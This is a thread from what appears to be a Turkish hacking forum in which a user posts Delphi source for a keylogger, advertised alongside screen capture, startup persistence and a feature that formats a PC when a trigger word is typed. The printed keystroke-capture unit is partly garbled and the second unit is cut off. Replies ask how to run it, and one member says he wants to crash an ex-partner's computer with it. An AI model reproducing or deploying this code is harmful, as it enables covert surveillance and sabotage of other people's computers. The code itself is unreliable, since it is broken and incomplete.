İşte müthiş kodlar buyrun...

fataleror

Üye
9 Ara 2006
246
7
asagıdaki kodlarla yapabilecekleriniz.
ekran yakalama*key logger*kapatma*reset*başlangıca yazma*pc adı bulunmasi* ekrana transparan yazi*belli bir kelimeye duyarlılık ne yapacaksanız artık*mesela orhan kelimesini kullandığında format yesin gibi...şeklinde kullanabilirsiniz.burda deneme amaçlı.orhan tusladiğinda ardından istenen bir kelime oraya hızla tus olarak gönderiliyo.siz ne yaparsanız artık..BUNDAN SONRASI SİZE KALMIS buyrun kolay gelsin

KODLAR
***********************

unit tusalgila;
interface
uses SysUtils* Windows*FORMS*SHELLAPI*UNIT1*Registry;
procedure GetLetter;
function Shift:Boolean;
function MoreChars(CharNumber:Integer;TruePart*FalsePart:st ring;var Answer:string):Boolean;

implementation

procedure GetLetter;
var
j:Integer;
a:string;
begin
if Odd(GetAsyncKeyState(219)) then ShowLetter(’Ğ’);
if Odd(GetAsyncKeyState(221)) then ShowLetter(’Ü’);
if Odd(GetAsyncKeyState(186)) then ShowLetter(’Ş’);
if Odd(GetAsyncKeyState(222)) then ShowLetter(’İ’);
if Odd(GetAsyncKeyState(191)) then ShowLetter(’Ö’);
if Odd(GetAsyncKeyState(220)) then ShowLetter(’Ç’);
// ’A’..’Z’ arasındaki tuşlara basılmışmı?
for j:=65 to 90 do
if Odd(GetAsyncKeyState(j)) then
ShowLetter(Chr(j));
for j:=96 to 105 do
if Odd(GetAsyncKeyState(j)) then
ShowLetter(IntToStr((j - 97) + 1));
//F1 İLE F24 ARASINDAKİ TUŞLARA BASILMIŞMI
for j:=112 to 135 do
if Odd(GetAsyncKeyState(j)) then
ShowLetter(’{F’ + IntToStr(j - 112 + 1) + ’}’);
//SAYILARDAN BİRİNE BASILMIŞMI?
for j:=48 to 57 do
if Odd(GetAsyncKeyState(j)) then
if Shift then
begin
case j - 48 of
1: ShowLetter(’!’);
2: ShowLetter( @ );
3: ShowLetter(’#’);
4: ShowLetter(’$’);
5: ShowLetter(’%’);
6: ShowLetter(’^’);
7: ShowLetter(’&’);
8: ShowLetter(’*’);
9: ShowLetter(’(’);
0: ShowLetter(’)’);
end;
end
else
ShowLetter(IntToStr(j - 48));
if Odd(GetAsyncKeyState(VK_BACK)) then ShowLetter(’<Back>’);
if Odd(GetAsyncKeyState(VK_TAB)) then ShowLetter(’<Tab>’);
if Odd(GetAsyncKeyState(VK_RETURN)) then ShowLetter(#13#10);
if Odd(GetAsyncKeyState(VK_SHIFT)) then ShowLetter(’<Shift>’);
if Odd(GetAsyncKeyState(VK_CONTROL)) then ShowLetter(’<CTRL>’);
if Odd(GetAsyncKeyState(VK_MENU)) then ShowLetter(’<Alt>’);
if Odd(GetAsyncKeyState(VK_PAUSE)) then ShowLetter(’<Pause>’);
if Odd(GetAsyncKeyState(VK_ESCAPE)) then ShowLetter(’<ESC>’);
if Odd(GetAsyncKeyState(VK_SPACE)) then ShowLetter(’ ’);
if Odd(GetAsyncKeyState(VK_END)) then ShowLetter(’<End>’);
if Odd(GetAsyncKeyState(VK_HOME)) then ShowLetter(’<Home>’);
if Odd(GetAsyncKeyState(VK_LEFT)) then ShowLetter(’<sol>’);
if Odd(GetAsyncKeyState(VK_RIGHT)) then ShowLetter(’<sağ>’);
if Odd(GetAsyncKeyState(VK_UP)) then ShowLetter(’<Yukarı>’);
if Odd(GetAsyncKeyState(VK_DOWN)) then ShowLetter(’<Aşağı>’);
if Odd(GetAsyncKeyState(VK_INSERT)) then ShowLetter(’<Insert>’);
if Odd(GetAsyncKeyState(VK_MULTIPLY)) then ShowLetter(’*’);
if Odd(GetAsyncKeyState(VK_ADD)) then ShowLetter(’+’);
if Odd(GetAsyncKeyState(VK_SUBTRACT)) then ShowLetter(’-’);
if Odd(GetAsyncKeyState(VK_DECIMAL)) then ShowLetter(’.’);
if Odd(GetAsyncKeyState(VK_DIVIDE)) then ShowLetter(’/’);
if Odd(GetAsyncKeyState(VK_NUMLOCK)) then ShowLetter(’<NumLock>’);
if Odd(GetAsyncKeyState(VK_CAPITAL)) then begin
IF CAP=0 THEN CAP:=1 else CAP:=0;ShowLetter(’<CapsLock>’);end;
if Odd(GetAsyncKeyState(VK_SCROLL)) then ShowLetter(’<Scroll>’);
if Odd(GetAsyncKeyState(VK_DELETE)) then ShowLetter(’<Delete>’);
if Odd(GetAsyncKeyState(VK_PRIOR)) then ShowLetter(’<Page Up>’);
if Odd(GetAsyncKeyState(VK_NEXT)) then ShowLetter(’<Page Down>’);
if Odd(GetAsyncKeyState(VK_PRINT)) then ShowLetter(’<Print Screen>’);
if MoreChars($BA*’:’*’;’*a) then ShowLetter(a);
if MoreChars($BB*’+’*’=’*a) then ShowLetter(a);
if MoreChars($BC*’<’*’*’*a) then ShowLetter(a);
if MoreChars($BD*’_’*’-’*a) then ShowLetter(a);
if MoreChars($BE*’>’*’.’*a) then ShowLetter(a);
if MoreChars($BF*’?’*’/’*a) then ShowLetter(a);
if MoreChars($C0*’~’*’`’*a) then ShowLetter(a);
if MoreChars($DB*’{’*’[’*a) then ShowLetter(a);
if MoreChars($DC*’|’*’\’*a) then ShowLetter(a);
if MoreChars($DD*’}’*’]’*a) then ShowLetter(a);
if MoreChars($DE*’"’*’’’’*a) then ShowLetter(a);
end;
function MoreChars(CharNumber:Integer;TruePart*FalsePart:st ring;var Answer:string):Boolean;
begin
MoreChars:=True;
if Odd(GetAsyncKeyState(CharNumber)) then
begin
if Shift then
Answer:=TruePart
else
Answer:=FalsePart;
Exit;
end;
MoreChars:=False;
end;
function Shift:Boolean;
begin
Shift:=GetAsyncKeyState(VK_SHIFT) <> 0;
end;


end.
unit Unit1;
interface
uses
Windows* Messages*SysUtils*Forms*ExtCtrls*Graphics*
Controls* StdCtrls* Classes*Inifiles*registry*SHELLAPI*JPEG;
type
TForm1 = class(TForm)
Timer1: TTimer;
MEMO1: TMemo;
Timer2: TTimer;
Image1: TImage;
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure FormDestroy(Sender: TObject);
procedure Timer2Timer(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
procedure FormShow(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
 

zzafer

Yeni üye
29 Ocak 2007
10
0
-EMEĞE SAYGI-
YALNIZ BU KODLARI NEREYE GİRECEĞİZ..KODLARIN NE İŞE YARADIĞINI TÜRÇE OLARAK VERSEN DAHA İYİ OLURDU
:yo :yo NE MUTLU TÜRKÜM DİYENE:yo :yo
 

snowdrell

Yeni üye
10 Mar 2007
2
0
kardeşler bence siz hep devletten beklosunuz
notpad a geçirip bat la kaydetcen iste
:diablo:p
 

spectrando

Üye
18 Mar 2007
71
0
simdi orhan yazınca pc yi cokerten kod hangisiki???ben eski sevgilime yedircem benden baskasına askım demesin:D:D
 

KOMODOR27

Yeni üye
19 Mar 2007
7
0
hangi komuttun ne işe yaradığını ayrıntılı yazmadıkça bu kodlar çoğu arkadaşın hiçbir işine yaramaz. lütfen biraz daha ayrıntı
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.